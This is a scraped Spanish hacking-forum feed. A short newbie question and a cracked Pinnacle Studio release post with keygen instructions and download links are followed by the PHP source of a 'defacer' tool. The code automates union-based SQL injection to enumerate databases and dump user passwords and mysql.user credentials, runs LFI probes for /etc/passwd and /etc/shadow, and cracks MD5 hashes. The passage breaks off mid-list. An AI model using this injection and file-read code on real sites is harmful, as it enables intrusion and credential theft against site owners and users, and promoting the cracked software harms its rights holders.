Quantcast
Channel: Comunidad Underground Hispana
Viewing all 11602 articles
Browse latest View live

crear programas

$
0
0
soy nuevo en esto y quisiera saber como debo iniciar y que me puede ayudar para poder crear programas??? (^_^):_si:

Pinnacle Studio 17 Ultimate by VPP | 1.31 GB

$
0
0
Pinnacle Studio 17 Ultimate by VPP | 1.31 GB



Pinnacle Studio Ultimate - a powerful and fast program to create professional-looking HD and 3D video and multimedia.


You get all the features and reliable technology contained in Pinnacle Studio Plus, as well - Live Capture, support 4K Ultra HD, iZotope Music and Speech Cleaner, more soundtracks Scorefitter and functions Blu-ray authoring.

Install

- install Pinnacle Key.exe
- install ssPS17U_setup.exe from setup folder
- enjoy


Descargar

http://shareflare.net/download/20138...part6.rar.html
http://shareflare.net/download/50886...part7.rar.html
http://shareflare.net/download/27770...part3.rar.html
http://shareflare.net/download/75663...part4.rar.html
http://shareflare.net/download/43731...part5.rar.html
http://shareflare.net/download/30729...part2.rar.html
http://shareflare.net/download/92966...part1.rar.html

[PHP] DH Defacer Tools 0.8

$
0
0
Un simple programa en PHP dedicado a las vulnerabilidades webs con las siguientes opciones :

[+] Bing Scanner con scanner SQLI incluido
[+] SQLI Scanner
[+] LFI Scanner
[+] Crackear varias hashes MD5
[+] Buscador del panel de administracion
[+] Localizador de IP y sus DNS
[+] Encoders para base64,HEX y MD5

Un video con ejemplos de uso :



El codigo :

Código:

<?php

// DH Defacer Tool 0.8
// (C) Doddy Hackman 2014

error_reporting(0);

//
$username = "admin";
$password = "21232f297a57a5a743894a0e4a801fc3"; //admin
//

if (isset($_COOKIE['portal'])) {
    $st = base64_decode($_COOKIE['portal']);
    $plit = split("@", $st);
    $user = $plit[0];
    $pass = $plit[1];
    if ($user == $username and $pass == $password) {
        darcolor();
        echo "
<table border=1 style='margin: 0 auto;'><title>DH Defacer Tools 0.8 (C) Doddy Hackman 2014</title><td><br><center><h2><b><a href='" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "'><h2>DH Defacer Tools 0.8</h3></a></h3></b></center><br><br></td><tr><td>";
        if (isset($_GET['bing'])) {
            if (isset($_POST['bingscan'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?bing" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                scanner_bing($_POST['dork'], $_POST['pages']);
                echo "\n</textarea></td></table>";
            } else {
                echo "
<form action=?bing method=POST>
<center><br><table border=1>
<td><center><h2>Bing Scanner</h2></center></td><tr>
<td><h3><br><center>Enter Dork</center></h3></td><tr>
<td><input type=text size=50 name=dork value=news.php+id></td><tr>
<td><center><h3>Enter Pages</h3></center></td><tr>
<td><input type=text size=50 name=pages value=2></td><tr>
<td><input type=submit size=500 name=bingscan style='height: 25px; width: 378px' value=Scan></td>
</table></center>
</form>
";
            }
        } elseif (isset($_GET['sql'])) {
            if (isset($_POST['scansql'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?sql" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                sqlscan($_POST['target']);
                echo "\n</textarea></td></table>";
            } elseif (isset($_POST['getables'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?sql" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                sql_tables($_POST['target']);
                echo "\n</textarea></td></table>";
            } elseif (isset($_POST['getdbs'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?sql" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                sql_dbs($_POST['target']);
                echo "\n</textarea></td></table>";
            } elseif (isset($_POST['getmysql'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?sql" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                sql_mysql($_POST['target']);
                echo "\n</textarea></td></table>";
            } elseif (isset($_POST['scancolumns'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?sql" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                sql_columns($_POST['target'], $_POST['tablesimple']);
                echo "\n</textarea></td></table>";
            } elseif (isset($_POST['scantablesdb'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?sql" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                sql_db_tables($_POST['target'], $_POST['db']);
                echo "\n</textarea></td></table>";
            } elseif (isset($_POST['scancolumnsdb'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?sql" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                sql_db_columns($_POST['target'], $_POST['dbname'], $_POST['tabledb']);
                echo "\n</textarea></td></table>";
            } elseif (isset($_POST['dumpernow'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?sql" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                sql_dumper($_POST['target'], $_POST['dumptable'], $_POST['dumpcol1'], $_POST['dumpcol2']);
                echo "\n</textarea></td></table>";
            } else {
                echo "

<center><br><table border=1>
<td><center><h2>SQLI Scanner</h2></center></td><tr>
<form action=?sql method=POST>
<td><input type=text size=93 name=target value=http://localhost/labs/sql.php?id=></td><tr>
<td><input type=submit name=scansql style='height: 20px; width: 333px' value='Scan'><input type=submit name=getables style='height: 20px; width: 120px' value='Get Tables'><input type=submit name=getdbs style='height: 20px; width: 120px' value='Get Databases'><input type=submit name=getmysql style='height: 20px; width: 120px' value='Get mysql.users'></td></tr>

<td><center><h2>Get Columns</h2></center></td><tr>
<td><input type=text size=93 name=tablesimple value=hackers></td><tr>
<td><input type=submit name=scancolumns style='height: 20px; width: 694px' value='Extract'><tr>

<td><center><h2>Get Tables of DB</h2></center></td><tr>
<td><input type=text size=93 name=db value=hackman></td><tr>
<td><input type=submit name=scantablesdb style='height: 20px; width: 694px' value='Extract'><tr>

<td><center><h2>Get Columns of DB & Table</h2></center></td><tr>
<td>DB : <input type=text size=40 name=dbname value=hackman></td><tr>
<td>Table : <input type=text size=37 name=tabledb value=hackers></td><tr>
<td><input type=submit name=scancolumnsdb style='height: 20px; width: 694px' value='Extract'><tr>

<td><center><h2>Dumper</h2></center></td><tr>
<td>Table : <input type=text size=42 name=dumptable value=hackers></td><tr>
<td>Column 1 : <input type=text size=37 name=dumpcol1 value=usuario></td><tr>
<td>Column 2 : <input type=text size=37 name=dumpcol2 value=password></td><tr>
<td><input type=submit name=dumpernow style='height: 20px; width: 694px' value='Dump'>

</form>

";
            }
        } elseif (isset($_GET['crack'])) {
            if (isset($_POST['crackscan'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?crack" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                $hashes = trim($_POST['hashes']);
                $hashes = explode("\n", $hashes);
                foreach($hashes as $hash) {
                    crackmd5(trim($hash));
                }
                echo "\n</textarea></td></table>";
            } else {
                echo "
<form action=?crack method=POST>
<center><br><table border=1>
<td><center><h2>MD5 Cracker</h2></center></td><tr>
<td><h3><br><center>Enter Hashes</center></h3></td><tr>
<td>
<textarea cols=50 rows=20 name=hashes>
</textarea>
</td><tr>
<td><input type=submit size=500 name=crackscan style='height: 25px; width: 390px' value=Crack></td>
</table></center>
</form>";
            }
        } elseif (isset($_GET['adminz'])) {
            if (isset($_POST['adminscan'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?adminz" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                paneladmin($_POST['target']);
                echo "\n</textarea></td></table>";
            } else {
                echo "
<form action=?adminz method=POST>
<center><br><table border=1>
<td><center><h2>Admin Finder</h2></center></td><tr>
<td><h3><br><center>Enter Page</center></h3></td><tr>
<td><input type=text size=50 name=target value=http://localhost/></td><tr>
<td><input type=submit size=500 name=adminscan style='height: 25px; width: 378px' value=Scan></td>
</table></center>
</form>
";
            }
        } elseif (isset($_GET['lfi'])) {
            if (isset($_POST['lfiscan'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?lfi" . ">Console</a></h2></center></td><tr>
<td>
<center>
<textarea cols=110 rows=40 name=code readonly>\n\n";
                lfiscan($_POST['target']);
                echo "\n</textarea>
</center>
</td></table>";
            } else {
                echo "
<form action=?lfi method=POST>
<center><br><table border=1>
<td><center><h2>LFI Scan</h2></center></td><tr>
<td><h3><br><center>Enter Page</center></h3></td><tr>
<td><input type=text size=50 name=target value=http://localhost/labs/lfi.php?file=></td><tr>
<td><input type=submit size=500 name=lfiscan style='height: 25px; width: 378px' value=Scan></td>
</table></center>
</form>
";
            }
        } elseif (isset($_GET['locate'])) {
            if (isset($_POST['locatescan'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?locate" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                locateip($_POST['target']);
                echo "\n</textarea></td></table>";
            } else {
                echo "
<form action=?locate method=POST>
<center><br><table border=1>
<td><center><h2>Locate IP</h2></center></td><tr>
<td><h3><br><center>Enter Page</center></h3></td><tr>
<td><input type=text size=50 name=target value=http://www.petardas.com/index.php></td><tr>
<td><input type=submit size=500 name=locatescan style='height: 25px; width: 378px' value=Scan></td>
</table></center>
</form>
";
            }
        } elseif (isset($_GET['encode'])) {
            if (isset($_POST['encodescan'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?encode" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                if ($_POST['optionsa'] == "MD5") {
                    echo "\n\t\t\t[+] MD5 : " . md5($_POST['tex']);
                }
                if ($_POST['optionsa'] == "Base64") {
                    echo "\n\t\t\t[+] base64_encode : " . base64_encode($_POST['tex']);
                }
                if ($_POST['optionsa'] == "Hex") {
                    echo "\n\t\t\t[+] Hex : " . hex($_POST['tex']);
                }
                echo "\n</textarea></td></table>";
            } elseif (isset($_POST['decodescan'])) {
                echo "
<table border=1>
<td><center><h2><a href=" . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?encode" . ">Console</a></h2></center></td><tr>
<td><textarea cols=110 rows=40 name=code readonly>\n\n";
                if ($_POST['optionsa'] == "MD5") {
                    echo "\n\t\t\t[+] MD5 : ?";
                }
                if ($_POST['optionsa'] == "Base64") {
                    echo "\n\t\t\t[+] base64_decode : " . base64_decode($_POST['tex']);
                }
                if ($_POST['optionsa'] == "Hex") {
                    echo "\n\t\t\t[+] Hex : " . hexdecode($_POST['tex']);
                }
                echo "\n</textarea></td></table>";
            } else {
                echo "<form action=?encode method=POST>
<center><br><table border=1>
<td><center><h2>Encoders</h2></center></td><tr>
<td>
<b>Text :</b> <input type=text name=tex value=test><select name=optionsa><option>MD5</option><option>Base64</option><option>Hex</option></select><input type=submit name=encodescan value=Encode><input type=submit name=decodescan value=Decode>
</form>
</td>
</table></center>
</form>";
            }
        } else {
            echo "<center><table border=1>
<td><h2><center><br><b>Menu</b></center></h2></td><tr><br><br>
<td width=300><h3><br><center><a href=?bing>Bing Scanner</a></center></h3></td><tr>
<td width=300><h3><br><center><a href=?sql>SQLI Scanner</a></center></h3></td><tr>
<td width=300><h3><br><center><a href=?lfi>LFI Scanner</a></center></h3></td><tr>
<td width=300><h3><br><center><a href=?crack>MD5 Cracker</a></center></h3></td><tr>
<td width=300><h3><br><center><a href=?adminz>Admin Finder</a></center></h3></td><tr>
<td width=300><h3><br><center><a href=?locate>Locate IP</a></center></h3></td><tr>
<td width=300><h3><br><center><a href=?encode>Encoders</a></center></h3></td><tr>
</table><br><br>";
        }
        echo "
</form></td><tr>
<td><center>
<br><center><b><a href='http://doddyhackman.webcindario.com'><b><h2>-- == (C) Doddy Hackman 2014 == --</h2></b></a></b></center><br><br></table>";
    }
} elseif (isset($_GET['admin'])) {
    if (isset($_POST['login'])) {
        if ($_POST['user'] == $username and md5($_POST['password']) == $password) {
            setcookie("portal", base64_encode($_POST['user'] . "@" . md5($_POST['password'])));
            echo "<script>alert('Welcome Idiot');</script>";
            echo '<meta http-equiv="refresh" content=0;URL=?=>';
        } else {
            echo "<script>alert('Fuck You');</script>";
        }
    } else {
        darcolor();
        echo "
<title>Administration</title>
<br><h1><center>Administration</center></h1>
<br><center>
<form action='?admin' method=POST>
Username : <input type=text name=user><br>
Password : <input type=password name=password><br><br>
<input type=submit name=login value=Enter><br>
</form>
</center><br><br>";
    }
} else {
    echo "<meta http-equiv='Refresh' content='0;url=http://www.google.com'>";
}
// Functions
//crackmd5("098f6bcd4621d373cade4e832627b4f6");
//lfiscan("http://localhost:8080/labs/lfi.php?file=");
//sqlscan("http://localhost:8080/labs/sql.php?id=");
//sql_tables("http://localhost:8080/labs/sql.php?id=-1+union+select+hackman,2,3");
//sql_columns("http://localhost:8080/labs/sql.php?id=-1+union+select+hackman,2,3","hackers");
//sql_dbs("http://localhost:8080/labs/sql.php?id=-1+union+select+hackman,2,3");
//sql_db_tables("http://localhost:8080/labs/sql.php?id=-1+union+select+hackman,2,3","hackman");
//sql_db_columns("http://localhost:8080/labs/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
//sql_mysql("http://localhost:8080/labs/sql.php?id=-1+union+select+hackman,2,3");
//sql_dumper("http://localhost:8080/labs/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
function cortar_limpio() {
    echo "</textarea>
</form></td><tr>
<td><center>
<br><center><b><a href='http://doddyhackman.webcindario.com'><b><h2>-- == (C) Doddy Hackman 2014 == --</h2></b></a></b></center><br><br></table>";
}
function sql_dumper($target, $tabla, $columna1, $columna2) {
    echo "\n\t\t\t[+] Fuzzing values ...\n";
    $url1 = $target;
    $url2 = $target;
    $url1 = str_replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count(" . $columna1 . "),char(69,82,84,79,82,56,53,52))))", $url1);
    $url2 = str_replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52)," . $columna1 . ",char(69,82,84,79,82,56,53,52)," . $columna2 . ",char(69,82,84,79,82,56,53,52))))", $url2);
    $code = toma($url1 . "+from+" . $tabla . "--");
    if (preg_match("/ERTOR854(.*)ERTOR854/i", $code)) {
        preg_match_all("/ERTOR854(.*)ERTOR854/i", $code, $re);
        $reco = $re[1][0];
        echo "\n\t\t\t[+] Values Found : " . $reco . "\n";
        for ($i = 0;$i <= $reco;$i++) {
            $code = toma($url2 . "+from+" . $tabla . "+limit+" . $i . ",1--");
            if (preg_match("/ERTOR854(.*)ERTOR854(.*)ERTOR854/i", $code)) {
                preg_match_all("/ERTOR854(.*)ERTOR854(.*)ERTOR854/i", $code, $re);
                echo "\n\t\t\t[+] " . $columna1 . " : " . $re[1][0];
                echo "\n\t\t\t[+] " . $columna2 . " : " . $re[2][0];
            }
        }
    } else {
        echo "\n\t\t\t[-] Not Found";
    }
    echo "\n\n\t\t\t[+] Finished";
}
function sql_mysql($target) {
    echo "\n\t\t\t[+] Fuzzing mysql.user ...\n";
    $url1 = $target;
    $url2 = $target;
    $url1 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))", $url1);
    $url2 = str_replace("hackman", "unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))", $url2);
    $code = toma($url1 . "+from+mysql.user--");
    if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
        preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
        $reco = $re[1][0];
        echo "\n\t\t\t[+] Values Found : " . $reco . "\n";
        for ($i = 0;$i <= $reco;$i++) {
            $code = toma($url2 . "+from+mysql.user+limit+" . $i . ",1--");
            if (preg_match("/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/i", $code)) {
                preg_match_all("/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/i", $code, $re);
                echo "\n\t\t\t[+] Host : " . $re[1][0];
                echo "\n\t\t\t[+] Username : " . $re[2][0];
                echo "\n\t\t\t[+] Password : " . $re[3][0];
            }
        }
    } else {
        echo "\n\t\t\t[-] Not Found";
    }
    echo "\n\n\t\t\t[+] Finished";
}
function sql_db_columns($target, $db, $table) {
    echo "\n\t\t\t[+] Fuzzing columns ...\n";
    $url1 = $target;
    $url2 = $target;
    $url1 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))", $url1);
    $url2 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))", $url2);
    $code = toma($url1 . "+from+information_schema.columns+where+table_name=" . hex($table) . "+and+table_schema=" . hex($db) . "--");
    if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
        preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
        $reco = $re[1][0];
        echo "\n\t\t\t[+] Columns Found : " . $reco . "\n";
        for ($i = 0;$i <= $reco;$i++) {
            $code = toma($url2 . "+from+information_schema.columns+where+table_name=" . hex($table) . "+and+table_schema=" . hex($db) . "+limit+" . $i . ",1--");
            if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
                preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
                echo "\n\t\t\t[+] Column : " . $re[1][0];
            }
        }
    } else {
        echo "\n\t\t\t[-] Not Found";
    }
    echo "\n\n\t\t\t[+] Finished";
}
function sql_db_tables($target, $db) {
    echo "\n\t\t\t[+] Fuzzing tables ...\n";
    $url1 = $target;
    $url2 = $target;
    $url1 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))", $url1);
    $url2 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))", $url2);
    $code = toma($url2 . "+from+information_schema.tables+where+table_schema=" . hex($db) . "--");
    if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
        preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
        $reco = $re[1][0];
        echo "\n\t\t\t[+] Tables Found : " . $reco . "\n";
        for ($i = 0;$i <= $reco;$i++) {
            $code = toma($url1 . "+from+information_schema.tables+where+table_schema=" . hex($db) . "+limit+" . $i . ",1--");
            if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
                preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
                echo "\n\t\t\t[+] Table : " . $re[1][0];
            }
        }
    } else {
        echo "\n\t\t\t[-] Not Found";
    }
    echo "\n\n\t\t\t[+] Finished";
}
function sql_dbs($target) {
    echo "\n\t\t\t[+] Fuzzing DBS ...\n";
    $url1 = $target;
    $url2 = $target;
    $url1 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))", $url1);
    $url2 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))", $url2);
    $code = toma($url1 . "+from+information_schema.schemata--");
    if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
        preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
        $reco = $re[1][0];
        echo "\n\t\t\t[+] DBS Found : " . $reco . "\n";
        for ($i = 0;$i <= $reco;$i++) {
            $code = toma($url2 . "+from+information_schema.schemata+limit+" . $i . ",1--");
            if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
                preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
                echo "\n\t\t\t[+] DB : " . $re[1][0];
            }
        }
    } else {
        echo "\n\t\t\t[-] Not Found";
    }
    echo "\n\n\t\t\t[+] Finished";
}
function sql_columns($target, $table) {
    echo "\n\t\t\t[+] Fuzzing columns ...\n";
    $url1 = $target;
    $url2 = $target;
    $url1 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))", $url1);
    $url2 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))", $url2);
    $code = toma($url1 . "+from+information_schema.columns+where+table_name=" . hex($table) . "--");
    if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
        preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
        $reco = $re[1][0];
        echo "\n\t\t\t[+] Columns Found : " . $reco . "\n";
        for ($i = 0;$i <= $reco;$i++) {
            $code = toma($url2 . "+from+information_schema.columns+where+table_name=" . hex($table) . "+limit+" . $i . ",1--");
            if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
                preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
                echo "\n\t\t\t[+] Column : " . $re[1][0];
            }
        }
    } else {
        echo "\n\t\t\t[-] Not Found";
    }
    echo "\n\n\t\t\t[+] Finished";
}
function sql_tables($target) {
    echo "\n\t\t\t[+] Fuzzing tables ...\n";
    $url1 = $target;
    $url2 = $target;
    $url1 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))", $url1);
    $url2 = str_replace("hackman", "unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))", $url2);
    $code = toma($url2 . "+from+information_schema.tables--");
    if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
        preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
        $reco = $re[1][0];
        echo "\n\t\t\t[+] Tables Found : " . $reco . "\n";
        for ($i = 17;$i <= $reco;$i++) {
            $code = toma($url1 . "+from+information_schema.tables+limit+" . $i . ",1--");
            if (preg_match("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code)) {
                preg_match_all("/RATSXPDOWN1(.*)RATSXPDOWN1/i", $code, $re);
                echo "\n\t\t\t[+] Table : " . $re[1][0];
            }
        }
    } else {
        echo "\n\n\t\t\t[-] Not Found";
    }
    echo "\n\n\t\t\t[+] Finished";
}
function sqlscan($target) {
    echo "\n\t\t\t[+] Scanning ...\n";
    $code = toma($target . "-1+union+select+1--");
    if (preg_match("/The used SELECT statements have a different number of columns/i", $code)) {
        echo "\n\t\t\t[+] Searching count of the columns";
        $sqli = "concat(0x646F6464796861636B6D616E,1,0x646F6464796861636B6D616E)";
        for ($i = 2;$i <= 70;$i++) {
            $sqli.= ",concat(0x646F6464796861636B6D616E,$i,0x646F6464796861636B6D616E)";
            $code = toma($target . "-1+union+select+" . $sqli . "--");
            if (preg_match("/doddyhackman(.*)doddyhackman/i", $code)) {
                $sac = preg_match("/doddyhackman(.*)doddyhackman/i", $code);
                echo "\n\t\t\t[+] Rows Length : $i";
                $sql = "1";
                for ($n = 2;$n <= $i;$n++) {
                    $sql.= ",$n";
                }
                $sqla = str_replace($sac, "hackman", $sql);
                echo "\n\t\t\t[+] SQLI : " . $target . "-1+union+select+" . $sqla . "--";
                echo "\n\t\t\t[+] The number $sac print data";
                $data_sql = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
                $sqlaa = str_replace("hackman", $data_sql, $sqla);
                $code = toma($target . "-1+union+select+" . $sqlaa);
                if (preg_match("/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/i", $code)) {
                    preg_match_all("/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/i", $code, $re);
                    echo "\n\t\t\t[+] DB Version : " . $re[1][0];
                    echo "\n\t\t\t[+] DB Name : " . $re[2][0];
                    echo "\n\t\t\t[+] DB Username : " . $re[3][0];
                }
                echo "\n\n\t\t\t[+] Finished";
                cortar_limpio();
            }
        }
    }
    echo "\n\t\t\t[-] Not Vulnerable";
}
function lfiscan($target) {
    $files = array('C:/xampp/htdocs/aca.txt', 'C:/xampp/htdocs/aca.txt', 'C:/xampp/htdocs/admin.php', 'C:/xampp/htdocs/leer.txt', '../../../boot.ini', '../../../../boot.ini', '../../../../../boot.ini', '../../../../../../boot.ini', '/etc/passwd', '/etc/shadow', '/etc/shadow~', '/etc/hosts', '/etc/motd', '/etc/apache/apache.conf', '/etc/fstab', '/etc/apache2/apache2.conf', '/etc/apache/httpd.conf', '/etc/httpd/conf/httpd.conf', '/etc/apache2/httpd.conf', '/etc/apache2/sites-available/default', '/etc/mysql/my.cnf', '/etc/my.cnf', '/etc/sysconfig/network-scripts/ifcfg-eth0', '/etc/redhat-release', '/etc/httpd/conf.d/php.conf', '/etc/pam.d/proftpd', '/etc/phpmyadmin/config.inc.php', '/var/www/config.php', '/etc/httpd/logs/error_log', '/etc/httpd/logs/error.log', '/etc/httpd/logs/access_log', '/etc/httpd/logs/access.log', '/var/log/apache/error_log', '/var/log/apache/error.log', '/var/log/apache/access_log', '/var/log/apache/access.log', '/var/log/apache2/error_log', '/var/log/apache2/error.log', '/var/log/apache2/access_log', '/var/log/apache2/access.log', '/var/www/logs/error_log', '/var/www/logs/error.log', '/var/www/logs/access_log', '/var/www/logs/access.log', '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log', '/usr/local/apache/logs/access_log', '/usr/local/apache/logs/access.log', '/var/log/error_log', '/var/log/error.log', '/var/log/access_log', '/var/log/access.log', '/etc/group', '/etc/security/group', '/etc/security/passwd', '/etc/security/user', '/etc/security/environ', '/etc/security/limits', '/usr/lib/security/mkuser.default', '/apache/logs/access.log', '/apache/logs/error.log', '/etc/httpd/logs/acces_log', '/etc/httpd/logs/acces.log', '/var/log/httpd/access_log', '/var/log/httpd/error_log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/logs/error.log', '/logs/access.log', '/usr/local/apache2/logs/access_log', '/usr/local/apache2/logs/access.log', '/usr/local/apache2/logs/error_log', '/usr/local/apache2/logs/error.log', '/var/log/httpd/access.log', '/var/log/httpd/error.log', '/opt/lampp/logs/access_log', '/opt/lampp/logs/error_log', '/opt/xampp/logs/access_log', '/opt/xampp/logs/error_log', '/opt/lampp/logs/access.log', '/opt/lampp/logs/error.log', '/opt/xampp/logs/access.log', '/opt/xampp/logs/error.log', 'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log', 'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log', '/usr/local/apache/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf', '/etc/apache/conf/httpd.conf', '/usr/local/etc/apache/conf/httpd.conf', '/usr/local/apache/httpd.conf', '/usr/local/apache2/httpd.conf', '/usr/local/httpd/conf/httpd.conf', '/usr/local/etc/apache2/conf/httpd.conf', '/usr/local/etc/httpd/conf/httpd.conf', '/usr/apache2/conf/httpd.conf', '/usr/apache/conf/httpd.conf', '/usr/local/apps/apache2/conf/httpd.conf', '/usr/local/apps/apache/conf/httpd.conf', '/etc/apache2/conf/httpd.conf', '/etc/http/conf/httpd.conf', '/etc/httpd/httpd.conf', '/etc/http/httpd.conf', '/etc/httpd.conf', '/opt/apache/conf/httpd.conf', '/opt/apache2/conf/httpd.conf', '/var/www/conf/httpd.conf', '/private/etc/httpd/httpd.conf', '/private/etc/httpd/httpd.conf.default', '/Volumes/webBackup/opt/apache2/conf/httpd.conf', '/Volumes/webBackup/private/etc/httpd/httpd.conf', '/Volumes/webBackup/private/etc/httpd/httpd.conf.default', 'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf', 'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf', 'C:\ProgramFiles\xampp\apache\conf\httpd.conf', '/usr/local/php/httpd.conf.php', '/usr/local/php4/httpd.conf.php', '/usr/local/php5/httpd.conf.php', '/usr/local/php/httpd.conf', '/usr/local/php4/httpd.conf', '/usr/local/php5/httpd.conf', 